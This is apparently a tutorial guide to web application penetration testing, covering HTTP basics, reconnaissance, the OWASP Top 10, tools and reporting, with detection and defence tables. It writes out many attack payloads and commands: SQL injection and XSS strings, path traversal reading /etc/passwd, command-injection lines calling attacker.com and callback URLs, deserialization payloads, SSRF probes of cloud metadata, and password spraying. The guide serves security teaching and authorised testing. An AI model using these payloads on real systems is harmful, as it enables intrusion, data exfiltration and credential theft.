Web Application Pentesting: The Complete Beginner's Guide

Web applications are the most common attack surface in modern organizations. From banking portals to social media, nearly every business relies on web apps. This guide teaches you how to find and exploit vulnerabilities in web applications - the core skill of any penetration tester.

This is Part 2 of the pentesting series - make sure you’ve read Network Fundamentals first.

Related: For API-specific testing, see API Security OWASP Top 10 and API Pentesting Cheat Sheet.

Quick Reference

Essential Commands

Task	Command
Directory enumeration	`gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt`
Subdomain enumeration	`ffuf -u http://FUZZ.target.com -w subdomains.txt -mc 200`
Technology fingerprint	`whatweb http://target.com`
Vulnerability scan	`nikto -h http://target.com`
SQL injection test	`sqlmap -u "http://target.com?id=1" --dbs`
XSS scanning	`dalfox url "http://target.com?q=test"`
SSL/TLS check	`testssl.sh https://target.com`
Intercept traffic	Burp Suite proxy on `127.0.0.1:8080`
Spider application	`gospider -s http://target.com -o output`
Find parameters	`arjun -u http://target.com/page`

HTTP Status Codes for Pentesters

Code	Meaning	Pentester Significance
200	OK	Normal response - check content
301/302	Redirect	Test for open redirect vulnerabilities
400	Bad Request	Potential parsing/injection point
401	Unauthorized	Authentication required - try bypass
403	Forbidden	Access control - try bypass techniques
404	Not Found	Directory enumeration indicator
405	Method Not Allowed	Try other HTTP methods
500	Server Error	Potential vulnerability - investigate
502/503	Gateway/Service Error	Backend issues - may reveal architecture

Essential Tools

1. HTTP Protocol Deep Dive

TL;DR: HTTP is the language of the web. Every web vulnerability involves manipulating HTTP requests or exploiting how servers handle responses. Master this first.

1.1 HTTP Request Structure

Every HTTP request has three parts:

POST /login HTTP/1.1                    <- Request Line
Host: target.com                        <- Headers
User-Agent: Mozilla/5.0
Cookie: session=abc123
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
                                        <- Empty line
username=admin&password=test            <- Body

Request Line Components:

Method: What action to perform (GET, POST, PUT, DELETE, etc.)
URI: The resource path (/login, /api/users/1)
Version: HTTP/1.1 or HTTP/2

Important Headers for Pentesters:

Header	Purpose	Attack Relevance
Host	Target domain	Virtual host attacks, host header injection
Cookie	Session data	Session hijacking, cookie manipulation
Authorization	Auth tokens	Token theft, JWT attacks
Content-Type	Body format	Content-type confusion attacks
User-Agent	Client identifier	WAF bypass, fingerprinting
Referer	Previous page	CSRF bypass, access control bypass
X-Forwarded-For	Original client IP	IP spoofing, access control bypass

1.2 HTTP Response Structure

HTTP/1.1 200 OK                         <- Status Line
Server: Apache/2.4.41                   <- Headers (info disclosure!)
Set-Cookie: session=xyz789; HttpOnly
Content-Type: text/html
X-Frame-Options: DENY
                                        <- Empty line
<!DOCTYPE html>...                      <- Body

Security Headers to Check:

Header	Purpose	Missing = Vulnerable To
Content-Security-Policy	XSS mitigation	XSS, code injection
X-Frame-Options	Clickjacking prevention	Clickjacking
X-Content-Type-Options	MIME sniffing prevention	MIME confusion
Strict-Transport-Security	Force HTTPS	SSL stripping
X-XSS-Protection	Browser XSS filter	XSS (legacy browsers)

1.3 HTTP Methods

Method	Purpose	Security Concerns
GET	Retrieve data	Parameters in URL (logged, cached)
POST	Submit data	Body data, CSRF if no tokens
PUT	Update/create resource	Unauthorized file upload
DELETE	Remove resource	Unauthorized deletion
PATCH	Partial update	Same as PUT
OPTIONS	Check allowed methods	Information disclosure
HEAD	Get headers only	Same as GET without body
TRACE	Echo request back	XST (Cross-Site Tracing)

Testing Checklist:

Test all methods on each endpoint (use OPTIONS first)
Check if PUT/DELETE are unexpectedly allowed
Try method override headers: X-HTTP-Method-Override: PUT
Test TRACE for XST attacks

Commands

View raw HTTP request/response

curl -v http://target.com

# Send POST request
curl -X POST http://target.com/login \
     -d "username=admin&password=test"

# Custom headers
curl -H "X-Forwarded-For: 127.0.0.1" http://target.com

# Test different methods
curl -X OPTIONS http://target.com -v
curl -X PUT http://target.com/test.txt -d "test"
curl -X DELETE http://target.com/file.txt

1.4 Cookies and Sessions

Cookie Attributes:

Attribute	Purpose	Security Impact
HttpOnly	No JavaScript access	Prevents XSS cookie theft
Secure	HTTPS only	Prevents interception
SameSite	Cross-site restrictions	CSRF protection
Domain	Cookie scope	Subdomain access
Path	URL path scope	Directory access
Expires/Max-Age	Lifetime	Session persistence

Attack	Detect	Defend
Session hijacking via XSS	Monitor cookie access patterns	HttpOnly flag
Session interception	Monitor for HTTP cookie transmission	Secure flag
Cross-site request forgery	CSRF token validation	SameSite=Strict
Session fixation	Log session ID changes pre/post login	Regenerate session on auth

Testing Checklist:

Check for missing HttpOnly flag
Check for missing Secure flag
Test session fixation (set session before login)
Test session after logout (is it invalidated?)
Check session timeout
Look for predictable session IDs

Commands

# View cookies
curl -c cookies.txt -b cookies.txt http://target.com -v

# Check Set-Cookie headers
curl -I http://target.com/login | grep -i set-cookie

# In browser DevTools: F12 -> Application -> Cookies

1.5 HTTPS and TLS

TL;DR: Check for weak TLS configurations, expired certificates, and mixed content.

Testing Checklist:

Test SSL/TLS version (TLS 1.2+ required)
Check for weak ciphers
Verify certificate validity
Check for mixed content (HTTP resources on HTTPS page)
Test HSTS header presence

Commands

# Comprehensive SSL/TLS test
testssl.sh https://target.com

# Quick cipher check
nmap --script ssl-enum-ciphers -p 443 target.com

# OpenSSL check
openssl s_client -connect target.com:443

# Check certificate
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -text

2. Web Application Architecture

TL;DR: Understand the components of a web app to know where vulnerabilities hide. Each layer (client, server, database) has its own attack surface.

2.1 Typical Architecture

[Browser] <--HTTP/S--> [Web Server] <---> [App Server] <---> [Database]
    |                       |                  |                 |
  Client              Apache/Nginx         PHP/Node/         MySQL/
  (HTML/JS)           Load Balancer        Python/.NET       PostgreSQL

Components and Attack Surfaces:

Component	Examples	Common Vulnerabilities
Frontend	HTML, CSS, JavaScript	XSS, DOM manipulation, exposed secrets
Web Server	Apache, Nginx, IIS	Misconfigs, directory listing, verb tampering
App Server	PHP, Node.js, Python, Java	Injection, logic flaws, deserialization
Database	MySQL, PostgreSQL, MongoDB	SQL injection, NoSQL injection
Cache	Redis, Memcached	Cache poisoning, unauthorized access
CDN	Cloudflare, Akamai	Bypass, cache deception

2.2 Same-Origin Policy (SOP)

What it is: Browser security that prevents scripts on one origin from accessing data on another origin.

Origin = Protocol + Domain + Port

https://example.com:443 ≠ http://example.com:443 (different protocol)
https://example.com ≠ https://api.example.com (different subdomain)
https://example.com ≠ https://example.com:8080 (different port)

What it is: A mechanism to relax SOP and allow controlled cross-origin requests.

Dangerous CORS Configurations:

Configuration	Risk
`Access-Control-Allow-Origin: *`	Anyone can read responses
Origin reflection without validation	Attacker origin allowed
`Access-Control-Allow-Credentials: true` with `*`	Credential theft

Testing Checklist:

Check CORS headers in responses
Test if origin is reflected: curl -H "Origin: https://evil.com" http://target.com/api
Check if credentials allowed with wildcard

Commands

# Check CORS headers
curl -H "Origin: https://evil.com" -I http://target.com/api

# Look for:
# Access-Control-Allow-Origin: https://evil.com  <- BAD (reflects evil origin)
# Access-Control-Allow-Credentials: true         <- Worse with above

2.4 Authentication vs Authorization

Concept	Question	Vulnerability If Broken
Authentication	”Who are you?”	Account takeover, impersonation
Authorization	”What can you do?”	Privilege escalation, data access

Common Auth Mechanisms:

Session cookies (traditional)
JWT tokens (stateless)
OAuth 2.0 (third-party)
API keys (services)
Basic/Digest auth (simple)

3. Reconnaissance and Enumeration

TL;DR: The more you know about the target, the more vulnerabilities you’ll find. Map everything before attacking.

3.1 Passive Reconnaissance

What: Gathering information without directly touching the target.

Attack	Detect	Defend
Google dorking	Cannot easily detect	Remove sensitive files, robots.txt
Wayback Machine	N/A	Request removal of old versions
Certificate transparency	N/A	Expected behavior, no defense needed
GitHub searching	Monitor for leaked creds	Secret scanning, education

Testing Checklist:

Google dorks: site:target.com filetype:pdf, inurl:admin, intitle:"index of"
Check Wayback Machine for old versions
Search crt.sh for subdomains
WHOIS lookup for contact info
Search GitHub for leaked credentials
Check Shodan/Censys for exposed services

Commands

# Certificate transparency (find subdomains)
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u

# Subdomain enumeration
subfinder -d target.com
amass enum -passive -d target.com

# GitHub dorking (manual)
# Search: "target.com" password
# Search: "target.com" api_key
# Search: "target.com" secret

# Wayback URLs
waybackurls target.com | tee wayback.txt

3.2 Active Reconnaissance

What: Directly interacting with the target to gather information.

Attack	Detect	Defend
Port scanning	IDS/firewall alerts	Proper firewall rules
Directory brute force	WAF, log analysis	Custom 404 pages, rate limiting
Technology fingerprinting	N/A	Obscure version info
Virtual host enumeration	Log unusual Host headers	Default vhost handling

Testing Checklist:

Port scan for web services (80, 443, 8080, 8443)
Fingerprint technologies (Wappalyzer, WhatWeb)
Directory and file enumeration
Virtual host discovery
Parameter discovery on endpoints

Commands

# Technology fingerprinting
whatweb http://target.com
# Or use Wappalyzer browser extension

# Directory enumeration
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,bak
ffuf -u http://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# File discovery
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt

# Virtual host discovery
gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
ffuf -u http://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -mc 200

# Parameter discovery
arjun -u http://target.com/page
paramspider -d target.com

Expected gobuster output:

/admin                (Status: 403) [Size: 287]
/backup               (Status: 200) [Size: 1234]
/config.php.bak       (Status: 200) [Size: 456]  <- Interesting!
/uploads              (Status: 301) [Size: 312]

3.3 Application Mapping

Testing Checklist:

Spider entire application (Burp/ZAP)
Map all forms and input fields
Identify all API endpoints
Document authentication flows
Find file upload functionality
Note user roles and permissions
Check robots.txt and sitemap.xml

4. OWASP Top 10 Web Vulnerabilities (2021)

Quick Reference

#	Vulnerability	One-Liner Test
A01	Broken Access Control	Change user ID, access admin pages
A02	Cryptographic Failures	Check for HTTP, weak TLS
A03	Injection	Add `'` or `"` to inputs
A04	Insecure Design	Test business logic flaws
A05	Security Misconfiguration	Default creds, verbose errors
A06	Vulnerable Components	Check versions for CVEs
A07	Auth Failures	Test password reset, sessions
A08	Software Integrity Failures	Check update mechanisms
A09	Logging Failures	Test if attacks are logged
A10	SSRF	Test URL params with internal IPs

4.1 A01: Broken Access Control

TL;DR: Can you access resources you shouldn’t? Change IDs, access admin pages, modify other users’ data.

Attack	Detect	Defend
IDOR - change object IDs	Alert on cross-user access	Validate ownership server-side
Forced browsing to admin	Log 403 responses	Deny by default, proper RBAC
Privilege escalation	Monitor role parameter changes	Server-side role validation
Path traversal	WAF rules, log `../` attempts	Validate and sanitize file paths

Testing Checklist:

Test IDOR by changing object IDs (user_id, order_id, etc.)
Access admin URLs as regular user (/admin, /dashboard)
Try path traversal: ../../../etc/passwd
Modify role/privilege parameters (role=admin, isAdmin=true)
Test with different user sessions (horizontal privilege)
Test with lower privilege accounts (vertical privilege)
Check if functions are controlled by client-side only

Commands

# Test IDOR
# Original request accesses user 123's data
curl -H "Cookie: session=YOUR_SESSION" "http://target.com/api/users/123/profile"

# Try accessing user 124's data with YOUR session
curl -H "Cookie: session=YOUR_SESSION" "http://target.com/api/users/124/profile"

# Forced browsing
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# Path traversal
curl "http://target.com/download?file=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"  # Filter bypass
curl "http://target.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"  # URL encoded

Vulnerable response (IDOR):

HTTP/1.1 200 OK
{"id": 124, "email": "victim@example.com", "ssn": "123-45-6789"}

Secure response:

HTTP/1.1 403 Forbidden
{"error": "Access denied"}

4.2 A02: Cryptographic Failures

TL;DR: Is sensitive data protected? Check for HTTP, weak encryption, exposed credentials.

Attack	Detect	Defend
Traffic interception (HTTP)	N/A	Enforce HTTPS, HSTS
Weak cipher exploitation	Monitor cipher usage	TLS 1.2+, strong ciphers only
Password hash cracking	N/A	bcrypt/scrypt, salting
Exposed sensitive data	Data loss prevention	Encryption at rest and in transit

Testing Checklist:

Check if sensitive pages served over HTTP
Test SSL/TLS configuration
Look for sensitive data in responses (passwords, SSNs, tokens)
Check password storage (is it hashed properly?)
Look for hardcoded secrets in JavaScript
Check if HSTS is implemented

Commands

# Test SSL/TLS
testssl.sh https://target.com

# Check for sensitive data exposure
curl -s http://target.com/api/user | grep -iE "password|ssn|secret|key|token"

# Check JavaScript for secrets
curl -s http://target.com/js/app.js | grep -iE "api_key|secret|password|token"

# Check HSTS
curl -I https://target.com | grep -i strict-transport

4.3 A03: Injection

TL;DR: Can you inject malicious code? Test every input field with SQL, XSS, and command injection payloads.

SQL Injection

Attack	Detect	Defend
Union-based SQLi	WAF, query logging	Parameterized queries
Boolean-based blind	Timing analysis	Input validation
Time-based blind	Slow query alerts	Stored procedures
Error-based	Error monitoring	Custom error pages

Testing Checklist:

Test with single quote '
Test with double quote "
Boolean tests: ' OR '1'='1, ' AND '1'='2
Time-based: '; WAITFOR DELAY '0:0:5'--
Union-based: ' UNION SELECT NULL--

Commands

# Manual testing
curl "http://target.com/search?q=test'"
curl "http://target.com/search?q=test' OR '1'='1"
curl "http://target.com/search?q=test' UNION SELECT NULL,NULL,NULL--"

# Automated with sqlmap
sqlmap -u "http://target.com/search?q=test" --dbs
sqlmap -u "http://target.com/search?q=test" -D database_name --tables
sqlmap -u "http://target.com/search?q=test" -D database_name -T users --dump

# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test" -p username

# With cookies
sqlmap -u "http://target.com/profile?id=1" --cookie="session=abc123"

Vulnerable response:

You have an error in your SQL syntax; check the manual...

Cross-Site Scripting (XSS)

Attack	Detect	Defend
Reflected XSS	WAF pattern matching	Output encoding
Stored XSS	Content monitoring	Input sanitization
DOM-based XSS	Client-side monitoring	CSP headers, safe DOM methods

Testing Checklist:

Test <script>alert(1)</script>
Test event handlers: <img src=x onerror=alert(1)>
Test in different contexts (HTML, attribute, JavaScript)
Try filter bypasses
Check for CSP headers

Commands

# Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><svg onload=alert(1)>
javascript:alert(1)
<body onload=alert(1)>

# Filter bypasses
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror="alert(1)">
<svg/onload=alert(1)>
<img src=x onerror=alert`1`>

# Automated XSS scanning
dalfox url "http://target.com/search?q=FUZZ"
xssstrike -u "http://target.com/search?q=test"

# Check for DOM XSS sources in JavaScript
# Look for: location.hash, location.search, document.URL, document.referrer

Vulnerable response (reflected XSS):

<p>Search results for: <script>alert(1)</script></p>

Command Injection

Attack	Detect	Defend
OS command injection	Process monitoring, WAF	Avoid system calls, input validation
Blind command injection	DNS/HTTP callback monitoring	Whitelist allowed inputs

Testing Checklist:

Test with ;, |, &&, ||
Test with backticks and $()
Time-based: ; sleep 10
Out-of-band: ; curl http://attacker.com

Commands

# Test payloads (in vulnerable parameter)
; ls -la
| cat /etc/passwd
`whoami`
$(id)
; ping -c 5 127.0.0.1
; sleep 10

# Blind detection (use Burp Collaborator or webhook.site)
; curl http://YOUR-CALLBACK-URL/$(whoami)
; nslookup YOUR-CALLBACK-URL
; wget http://YOUR-CALLBACK-URL

# Automated testing
commix -u "http://target.com/ping?ip=127.0.0.1"

4.4 A04: Insecure Design

TL;DR: Design flaws that can’t be fixed with code. Missing security controls, abuse of business logic.

Testing Checklist:

Test business logic flaws (negative quantities, price manipulation)
Check for race conditions
Test password reset flow completely
Check multi-step process manipulation (skip steps)
Look for missing rate limiting
Test referral/reward system abuse

Examples

Business logic flaw:

# Change quantity to negative (get money back?)
POST /cart/update
{"item_id": 123, "quantity": -5, "price": 100}

# Change price
POST /cart/update
{"item_id": 123, "quantity": 1, "price": 0.01}

Race condition:

# Send multiple requests simultaneously
# Example: Redeem coupon multiple times
for i in {1..50}; do
  curl -X POST http://target.com/redeem -d "code=DISCOUNT50" &
done

4.5 A05: Security Misconfiguration

TL;DR: Default settings, verbose errors, unnecessary features enabled.

Attack	Detect	Defend
Default credentials	Login monitoring	Change all defaults
Directory listing	Access logs	Disable directory listing
Verbose errors	Error monitoring	Custom error pages
Debug endpoints	Access logs	Disable in production
Unnecessary HTTP methods	N/A	Disable unused methods

Testing Checklist:

Check for default credentials (admin:admin, root:root)
Test for directory listing
Trigger verbose error messages
Look for debug endpoints (/debug, /console, /actuator)
Check security headers
Find exposed admin interfaces
Check for unnecessary HTTP methods
Look for backup files (.bak, .old, ~)

Commands

# Check directory listing
curl http://target.com/images/
curl http://target.com/uploads/

# Trigger errors
curl "http://target.com/api/user/'"
curl "http://target.com/api/user/999999999999999"

# Find admin interfaces
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# Security headers check
curl -I http://target.com | grep -iE "x-frame|csp|hsts|x-content|x-xss"

# Backup files
gobuster dir -u http://target.com -w common.txt -x bak,old,txt,zip,tar.gz

# Debug endpoints
curl http://target.com/debug
curl http://target.com/actuator
curl http://target.com/console
curl http://target.com/.git/HEAD

Vulnerable directory listing:

Index of /backup/
[DIR] 2023/
[FILE] database.sql     1.2MB
[FILE] config.php.bak   2KB

4.6 A06: Vulnerable and Outdated Components

TL;DR: Old software has known exploits. Identify versions and check for CVEs.

Testing Checklist:

Fingerprint all technologies and versions
Check JavaScript libraries (retire.js)
Search exploitdb/CVEs for identified versions
Check for outdated CMS (WordPress, Drupal)
Look for vulnerable frameworks

Commands

# Fingerprint technologies
whatweb http://target.com
nikto -h http://target.com

# Check JavaScript libraries
# In browser: F12 -> Console -> Type: jQuery.fn.jquery
# Or use Retire.js browser extension

# Search for exploits
searchsploit "apache 2.4"
searchsploit "wordpress 5.0"

# WordPress scanning
wpscan --url http://target.com --enumerate u,vp,vt

# Nuclei CVE scanning
nuclei -u http://target.com -t cves/

4.7 A07: Identification and Authentication Failures

TL;DR: Weak passwords, broken sessions, missing MFA. Test all authentication mechanisms.

Attack	Detect	Defend
Credential stuffing	Failed login monitoring	Rate limiting, MFA, breach detection
Password spraying	Distributed login analysis	Account lockout, MFA
Session hijacking	Session anomaly detection	Secure cookies, session binding
Brute force	Failed login alerts	Rate limiting, CAPTCHA, lockout

Testing Checklist:

Test for username enumeration
Check password policy (minimum requirements)
Test account lockout mechanism
Test password reset flow (token reuse, guessing)
Check session management
Test “remember me” functionality
Check for MFA bypass
Test OAuth/SSO implementation

Commands

# Username enumeration (different response for valid vs invalid)
ffuf -u "http://target.com/login" -X POST \
     -d "username=FUZZ&password=invalid" \
     -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
     -mr "Invalid password"  # Response for valid username

# Password spraying
hydra -L users.txt -p "Password123!" target.com http-post-form \
      "/login:username=^USER^&password=^PASS^:Invalid credentials"

# Check password reset
# 1. Request reset for your account
# 2. Check token format (predictable? short?)
# 3. Check if token expires
# 4. Check if token can be reused

4.8 A08: Software and Data Integrity Failures

TL;DR: Insecure deserialization, CI/CD compromises, unsigned updates.

Testing Checklist:

Look for serialized data in cookies/parameters (base64 encoded objects)
Test for insecure deserialization
Check CI/CD pipeline security
Verify update/patch integrity mechanisms
Check for unsigned software components

Deserialization Payloads

Java serialization (look for rO0 base64 prefix or aced hex):

# Use ysoserial to generate payloads
java -jar ysoserial.jar CommonsCollections1 'curl http://attacker.com' | base64

PHP serialization (look for O: prefix):

O:4:"User":1:{s:4:"name";s:5:"admin";}

Python pickle (look for base64 encoded binary):

import pickle
import base64
payload = pickle.dumps({"command": "__import__('os').system('id')"})
print(base64.b64encode(payload))

4.9 A09: Security Logging and Monitoring Failures

TL;DR: If attacks aren’t logged, they won’t be detected. Test what gets logged.

Testing Checklist:

Verify failed logins are logged
Check if injection attempts trigger alerts
Test rate limiting triggers
Verify audit trail exists for sensitive actions
Check if logs contain sufficient detail

4.10 A10: Server-Side Request Forgery (SSRF)

TL;DR: Make the server request internal resources. Test any parameter that takes a URL.

Attack	Detect	Defend
Access internal services	Monitor outbound requests	Whitelist allowed domains
Cloud metadata access	Alert on 169.254.169.254	Block metadata IP
Port scanning	Monitor internal connections	Network segmentation
Protocol smuggling	Protocol monitoring	Restrict protocols (http/https only)

Testing Checklist:

Identify URL parameters (url=, path=, src=, redirect=)
Test localhost: http://127.0.0.1/admin
Test internal IPs: http://192.168.1.1/
Test cloud metadata: http://169.254.169.254/latest/meta-data/
Try filter bypasses
Test with different protocols: file://, gopher://

Commands

# Basic SSRF payloads
http://127.0.0.1/admin
http://localhost/admin
http://[::1]/admin
http://169.254.169.254/latest/meta-data/  # AWS
http://metadata.google.internal/           # GCP

# IP variations for filter bypass
http://2130706433/          # Decimal IP (127.0.0.1)
http://0x7f000001/          # Hex IP
http://0177.0.0.1/          # Octal
http://127.1/               # Short form
http://127.0.0.1.nip.io/    # DNS rebinding service

# Protocol variations
file:///etc/passwd
gopher://internal:6379/_REDIS_COMMANDS
dict://internal:11211/stats

# Out-of-band detection
http://YOUR-BURP-COLLABORATOR-URL

Vulnerable response (AWS metadata):

{
  "AccessKeyId": "AKIA...",
  "SecretAccessKey": "...",
  "Token": "..."
}

5. Essential Tools

5.1 Burp Suite

The industry standard web proxy for testing.

Key Features:

Proxy: Intercept and modify requests
Repeater: Manually test requests
Intruder: Automated attacks (fuzzing, brute force)
Scanner: Automated vulnerability scanning (Pro)
Comparer: Compare responses

Essential Extensions:

Autorize (authorization testing)
JWT Editor (JWT manipulation)
Param Miner (parameter discovery)
Active Scan++ (enhanced scanning)
Logger++ (enhanced logging)

5.2 Directory/Content Discovery

# gobuster - Go-based, fast
gobuster dir -u http://target.com -w wordlist.txt -x php,html,txt -t 50

# ffuf - Flexible fuzzing
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -t 50

# feroxbuster - Rust-based, recursive
feroxbuster -u http://target.com -w wordlist.txt

# Recommended wordlists:
# /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
# /usr/share/seclists/Discovery/Web-Content/common.txt
# /usr/share/wordlists/dirb/big.txt

5.3 Vulnerability Scanners

# nikto - Web server scanner
nikto -h http://target.com

# nuclei - Template-based scanner
nuclei -u http://target.com -t cves/ -t vulnerabilities/

# wpscan - WordPress scanner
wpscan --url http://target.com --enumerate u,vp,vt,dbe

# sqlmap - SQL injection
sqlmap -u "http://target.com?id=1" --batch --risk=3 --level=5

Tool Reference

Tool	Purpose	Quick Command
Burp Suite	Proxy/testing	GUI - configure browser to 127.0.0.1:8080
OWASP ZAP	Free proxy/scanner	GUI or `zap-cli quick-scan http://target`
gobuster	Directory brute force	`gobuster dir -u URL -w wordlist`
ffuf	Fuzzing	`ffuf -u URL/FUZZ -w wordlist`
sqlmap	SQL injection	`sqlmap -u URL --dbs`
nikto	Web scanner	`nikto -h URL`
nuclei	Vulnerability scanner	`nuclei -u URL -t cves/`
whatweb	Fingerprinting	`whatweb URL`
wpscan	WordPress scanner	`wpscan --url URL`
dalfox	XSS scanner	`dalfox url URL`

6. Testing Methodology

OWASP Testing Guide Phases

Phase	Focus	Key Activities
Information Gathering	Reconnaissance	Passive/active recon, fingerprinting
Configuration Testing	Misconfigurations	Headers, methods, files, defaults
Identity Management	User handling	Registration, account provisioning
Authentication Testing	Login security	Credentials, sessions, MFA
Authorization Testing	Access control	IDOR, privilege escalation
Session Management	Session handling	Cookies, tokens, logout
Input Validation	Injection flaws	SQLi, XSS, command injection
Error Handling	Information leakage	Verbose errors, stack traces
Cryptography	Encryption flaws	TLS, password storage
Business Logic	Logic flaws	Workflow bypass, race conditions
Client-Side	Browser security	DOM XSS, clickjacking, postMessage

Comprehensive Testing Checklist

Full Checklist

Reconnaissance

Authentication

Authorization

Horizontal privilege escalation (IDOR)
Vertical privilege escalation
Forced browsing
Path traversal

Injection

Configuration

Business Logic

Price/quantity manipulation
Multi-step process bypass
Race conditions
Referral abuse

Client-Side

Clickjacking
CORS misconfiguration
PostMessage vulnerabilities
Local storage sensitive data

7. Reporting Template

## Finding: [Vulnerability Name]

**Severity:** Critical / High / Medium / Low (CVSS X.X)
**CWE:** CWE-XXX
**URL:** https://target.com/vulnerable/endpoint
**Parameter:** [Vulnerable parameter name]

### Description
[Brief description of the vulnerability and its type]

### Steps to Reproduce
1. Navigate to https://target.com/vulnerable/endpoint
2. Intercept the request with Burp Suite
3. Modify the [parameter] to [payload]
4. Observe [vulnerability indicator]

### Proof of Concept
[Request]

POST /api/users/123 HTTP/1.1 Host: target.com Cookie: session=abc123

{“id”: 124} <— Modified to access another user


[Response]

HTTP/1.1 200 OK {“id”: 124, “email”: “victim@example.com”, “ssn”: “123-45-6789”}


### Impact
[Business impact - data exposure, account takeover, etc.]

### Remediation
[Specific fix recommendations]

### References
- OWASP: https://owasp.org/...
- CWE: https://cwe.mitre.org/...

8. Practice Labs

Vulnerable Applications

Lab	Focus	Setup
DVWA	OWASP Top 10 basics	`docker run -d -p 80:80 vulnerables/web-dvwa`
Juice Shop	Modern web app	`docker run -d -p 3000:3000 bkimminich/juice-shop`
WebGoat	OWASP learning	`docker run -d -p 8080:8080 webgoat/webgoat`
bWAPP	100+ vulnerabilities	Docker available
HackTheBox	Real scenarios	https://hackthebox.com
TryHackMe	Guided learning	https://tryhackme.com
PortSwigger	In-depth labs	https://portswigger.net/web-security

Recommended Learning Path

PortSwigger Web Security Academy (Free, comprehensive)
- All SQL injection labs
- All XSS labs
- All authentication labs
- All access control labs
TryHackMe Rooms
- OWASP Top 10
- Burp Suite Basics
- SQL Injection
- XSS
- Web Fundamentals
HackTheBox (when ready for challenges)
- Starting Point machines
- Easy-rated web machines

9. Glossary

Term	Definition
CORS	Cross-Origin Resource Sharing - browser mechanism for controlled cross-origin requests
CSRF	Cross-Site Request Forgery - forging authenticated requests from victim’s browser
CSP	Content Security Policy - HTTP header to prevent XSS
DOM	Document Object Model - browser’s representation of the page
HSTS	HTTP Strict Transport Security - forces HTTPS connections
IDOR	Insecure Direct Object Reference - accessing objects by changing IDs
JWT	JSON Web Token - stateless authentication token
LFI	Local File Inclusion - reading local files through application
RFI	Remote File Inclusion - including remote files for execution
SOP	Same-Origin Policy - browser security isolating origins
SQLi	SQL Injection - manipulating database queries
SSRF	Server-Side Request Forgery - making server request attacker-controlled URLs
SSTI	Server-Side Template Injection - injecting into template engines
WAF	Web Application Firewall - filters malicious requests
XSS	Cross-Site Scripting - injecting client-side scripts
XXE	XML External Entity - XML parser attack for file reading/SSRF

What’s Next?

Now that you understand web application pentesting, continue with:

API Security OWASP Top 10 - API-specific vulnerabilities
API Pentesting Cheat Sheet - Hands-on API testing
Active Directory Attack Path - Internal network attacks
Linux Privilege Escalation - Post-exploitation on Linux
Windows Privilege Escalation - Post-exploitation on Windows

Questions or feedback? Open an issue on GitHub.

Web Application Pentesting: The Complete Beginner's Guide

Quick Reference

Essential Commands

HTTP Status Codes for Pentesters

Essential Tools

1. HTTP Protocol Deep Dive

1.1 HTTP Request Structure

1.2 HTTP Response Structure

1.3 HTTP Methods

1.4 Cookies and Sessions

1.5 HTTPS and TLS

2. Web Application Architecture

2.1 Typical Architecture

2.2 Same-Origin Policy (SOP)

2.3 CORS (Cross-Origin Resource Sharing)

2.4 Authentication vs Authorization

3. Reconnaissance and Enumeration

3.1 Passive Reconnaissance

3.2 Active Reconnaissance

3.3 Application Mapping

4. OWASP Top 10 Web Vulnerabilities (2021)

Quick Reference

4.1 A01: Broken Access Control

4.2 A02: Cryptographic Failures

4.3 A03: Injection

SQL Injection

Cross-Site Scripting (XSS)

Command Injection

4.4 A04: Insecure Design

4.5 A05: Security Misconfiguration

4.6 A06: Vulnerable and Outdated Components

4.7 A07: Identification and Authentication Failures

4.8 A08: Software and Data Integrity Failures

4.9 A09: Security Logging and Monitoring Failures

4.10 A10: Server-Side Request Forgery (SSRF)

5. Essential Tools

5.1 Burp Suite

5.2 Directory/Content Discovery

5.3 Vulnerability Scanners

Tool Reference

6. Testing Methodology

OWASP Testing Guide Phases

Comprehensive Testing Checklist

7. Reporting Template

8. Practice Labs

Vulnerable Applications

Recommended Learning Path

9. Glossary

What’s Next?